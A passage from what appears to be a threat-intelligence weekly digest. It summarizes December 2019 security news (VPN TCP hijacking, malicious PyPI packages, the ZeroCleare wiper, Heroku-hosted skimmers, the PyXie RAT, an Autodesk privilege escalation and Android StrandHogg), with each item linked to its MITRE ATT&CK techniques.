The vulnerability can enable an actor to be determined if a user is connected to a VPN, and infer information about traffic sequence allowing for data to be injected into the TCP stream. An attack can occur by an actor gathering the VPN client’s virtual IP, using it to determine active connections, determine the packet sequence and number of active connections to hijack the TCP stream.<br/> <a href="https://forum.anomali.com/t/cve-2019-14899-inferring-and-hijacking-vpn-tunneled-tcp/4426" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947291">[MITRE ATT&amp;CK] Commonly Used Port - T1043</a></p><p><a href="https://www.zdnet.com/article/two-malicious-python-libraries-removed-from-pypi/" target="_blank"><b>Two Malicious Python Libraries Caught Stealing SSH and GPG Keys</b></a> (<i>December 4, 2019</i>)<br/> Two Python libraries have been removed by the Python Security Team, due to the libraries stealing SSH and GPG keys from Python projects. Both libraries utilized typosquatting to imitate legitimate libraries, such as “dateutil”, a popular date library, and “jellyfish”, a string comparison library. The malicious jellyfish package downloads a file that lists directories and attempts to exfiltrate SSH and GPG keys from the user and send to an IP. 
As the malicious libraries also contained the original, legitimate code, the packages worked as intended, allowing the malicious code to go undetected until developers raised concerns.<br/> <a href="https://forum.anomali.com/t/two-malicious-python-libraries-caught-stealing-ssh-and-gpg-keys/4427" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947224">[MITRE ATT&amp;CK] Exfiltration Over Alternative Protocol - T1048</a> | <a href="https://ui.threatstream.com/ttp/947215">[MITRE ATT&amp;CK] Accessibility Features - T1015</a></p><p><a href="https://securityintelligence.com/posts/new-destructive-wiper-zerocleare-targets-energy-sector-in-the-middle-east/" target="_blank"><b>New Destructive Wiper ZeroCleare Targets Energy Sector in the Middle East</b></a> (<i>December 4, 2019</i>)<br/> Researchers at IBM X-Force have named a destructive wiper targeting the industrial and energy sectors in the Middle East “ZeroCleare”. The wiper abuses the legitimate EldoS RawDisk driver, a tool for interacting with files, disks and partitions, to overwrite the master boot record (MBR) and damage disk partitions. The actors gain access to network accounts by brute-forcing passwords, then use those accounts to deploy China Chopper and Tunna web shells. Credential harvesters such as Mimikatz are used to gather and exfiltrate credentials from the victim’s machines. 
X-Force assesses that actors from OilRig, an Iran-backed group, and a second, unnamed, likely Iran-based group are behind the campaign.<br/> <a href="https://forum.anomali.com/t/new-destructive-wiper-zerocleare-targets-energy-sector-in-the-middle-east/4428" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947287">[MITRE ATT&amp;CK] PowerShell - T1086</a> | <a href="https://ui.threatstream.com/ttp/947277">[MITRE ATT&amp;CK] Exfiltration Over Physical Medium - T1052</a> | <a href="https://ui.threatstream.com/ttp/947087">[MITRE ATT&amp;CK] Credential Dumping - T1003</a></p><p><a href="https://blog.malwarebytes.com/web-threats/2019/12/theres-an-app-for-that-web-skimmers-found-on-paas-heroku/" target="_blank"><b>There's An App For That: Web Skimmers Found on PaaS Heroku</b></a> (<i>December 4, 2019</i>)<br/> Malwarebytes Labs researchers have identified web skimmers hosted on Heroku, a cloud Platform-as-a-Service (PaaS). The skimming script is injected into ecommerce websites, where it presents a fake payment-form overlay that captures the victim’s card details and exfiltrates them in an encoded format to the attacker’s Heroku app. 
Heroku’s freemium model lets threat actors host skimming code at little or no cost, and detection is harder because the exfiltration traffic goes to a legitimate, widely used domain.<br/> <a href="https://forum.anomali.com/t/theres-an-app-for-that-web-skimmers-found-of-paas-heroku/4429" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&amp;CK] Scripting - T1064</a></p><p><a href="https://threatvector.cylance.com/en_us/home/meet-pyxie-a-nefarious-new-python-rat.html" target="_blank"><b>Meet Pyxie: A Nefarious New Python RAT</b></a> (<i>December 2, 2019</i>)<br/> Cylance researchers have identified a Python Remote Access Trojan (RAT) dubbed “PyXie”. Although it has been in the wild since at least 2018, the RAT is now being used in an ongoing campaign that targets multiple industries, including education and healthcare, to deliver ransomware. The infection chain abuses legitimate binaries to sideload a malicious loader together with its encrypted payload; both are copied to a new directory and a registry value is created for persistence. The third-stage payload, a “Cobalt Mode” downloader, is injected into a process chosen by searching the System32 directory against a set of selection criteria. Cobalt Mode connects to a Command and Control (C2) server, downloads and decrypts the final payload, and carries out environment checks. 
PyXie RAT is the final-stage payload, with support for credential harvesting, cookie theft, input capture, output (screen) capture, execution of arbitrary payloads, web injects and Virtual Network Computing (VNC).<br/> <a href="https://forum.anomali.com/t/meet-pyxie-a-nefarious-new-python-rat/4430" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947142">[MITRE ATT&amp;CK] Process Injection - T1055</a> | <a href="https://ui.threatstream.com/ttp/947243">[MITRE ATT&amp;CK] Input Capture - T1056</a> | <a href="https://ui.threatstream.com/ttp/947079">[MITRE ATT&amp;CK] Screen Capture - T1113</a> | <a href="https://ui.threatstream.com/ttp/947266">[MITRE ATT&amp;CK] Data Encrypted - T1022</a> | <a href="https://ui.threatstream.com/ttp/947166">[MITRE ATT&amp;CK] Modify Registry - T1112</a> | <a href="https://ui.threatstream.com/ttp/947087">[MITRE ATT&amp;CK] Credential Dumping - T1003</a> | <a href="https://ui.threatstream.com/ttp/947136">[MITRE ATT&amp;CK] Deobfuscate/Decode Files or Information - T1140</a></p><p><a href="https://safebreach.com/Post/Autodesk-Desktop-Application-Privilege-Escalation-to-SYSTEM-N40-CVE-2019-7365-N41" target="_blank"><b>Autodesk Desktop Application - Privilege Escalation to SYSTEM (CVE-2019-7365)</b></a> (<i>December 2, 2019</i>)<br/> Researchers at SafeBreach Labs have discovered a vulnerability in the Autodesk Desktop Application (ADA) that can be used to achieve privilege escalation and persistence on Windows desktop systems. ADA is a companion application for Autodesk’s Windows-based products that delivers security patches and updates to subscribers. The vulnerability, “CVE-2019-7365”, is a DLL preloading (search-order hijacking) flaw: the application’s service attempts to load a DLL that it resolves through its working directory, so a malicious DLL placed there is loaded and executed with the service’s privileges. 
Because the DLL is loaded each time the service starts, the payload gains persistence, and it runs as NT AUTHORITY\SYSTEM, the most privileged local account on Windows. SafeBreach reported the vulnerability to Autodesk, and a patch has been available since November 27.<br/> <a href="https://forum.anomali.com/t/autodesk-desktop-application-privilege-escalation-to-system-cve-2019-7365/4431" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947232">[MITRE ATT&amp;CK] DLL Side-Loading - T1073</a></p><p><a href="https://www.bleepingcomputer.com/news/security/actively-exploited-strandhogg-vulnerability-affects-android-os/" target="_blank"><b>Actively Exploited StrandHogg Vulnerability Affects Android OS</b></a> (<i>December 2, 2019</i>)<br/> The newly identified Android vulnerability, named “StrandHogg” by Promon researchers, is being exploited by the BankBot banking Trojan. The flaw lies in Android’s handling of the “taskAffinity” attribute: a malicious app can declare an affinity for a legitimate app’s task and so assume that app’s identity in the multitasking system, presenting its own screens as if they belonged to the target. An attacker exploiting this can access the microphone and camera, obtain location data, read SMS messages, and request permissions that enable theft of credentials and banking information. 
So far, 36 malicious applications, including BankBot, have been identified exploiting the vulnerability.<br/> <a href="https://forum.anomali.com/t/actively-exploited-strandhogg-vulnearbility-affects-android-os/4432" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/1260052">[MITRE MOBILE-ATT&amp;CK] Access Contact List - T1432</a> | <a href="https://ui.threatstream.com/ttp/1260088">[MITRE MOBILE-ATT&amp;CK] Location Tracking - T1430</a> | <a href="https://ui.threatstream.com/ttp/1260117">[MITRE MOBILE-ATT&amp;CK] Standard Application Layer Protocol - T1437</a> | <a href="https://ui.threatstream.com/ttp/1260119">[MITRE MOBILE-ATT&amp;CK] System Information Discovery - T1426</a></p></div></div>
